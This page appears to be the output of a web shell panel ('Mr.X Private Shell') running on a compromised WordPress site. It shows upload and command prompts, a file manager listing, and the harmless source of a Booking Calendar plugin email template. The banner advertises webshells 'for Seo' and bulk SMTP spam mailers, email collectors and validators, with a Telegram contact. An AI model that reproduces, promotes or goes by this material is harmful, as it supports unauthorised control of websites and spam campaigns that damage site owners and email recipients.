__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php  /**
 * @version 1.0
 * @package: Emails
 * @category: Templates
 * @author wpdevelop
 *
 * @web-site https://wpbookingcalendar.com/
 * @email [email protected] 
 * 
 * @modified 2015-06-16
 */

if ( ! defined( 'ABSPATH' ) ) exit;                                             // Exit if accessed directly


/**
 * get email template
 * 
 * @param array $fields_values
 */
function wpbc_email_template_plain_text( $fields_values ) {
    
    ob_start();

    if ( ! empty($fields_values['header_content'] ) ) {
        
        echo wp_kses_post( wptexturize( $fields_values['header_content'] ) ) . "\n\n";  //Header
    }
    
    echo ( wp_kses_post( wptexturize( $fields_values['content'] ) ) );          //Content

    if ( ! empty( $fields_values['footer_content'] ) ) {
        
        echo "\n\n" .  wp_kses_post( wptexturize( $fields_values['footer_content'] ) ); //Footer 
    }
    return ob_get_clean();                                                      // Return this email content
}

Filemanager

Name Type Size Permission Actions
index.php File 27 B 0640
plain-html-tpl.php File 3.87 KB 0640
plain-text-tpl.php File 1.03 KB 0640
standard-html-tpl.php File 30.35 KB 0640
standard-text-tpl.php File 1.18 KB 0640
Filemanager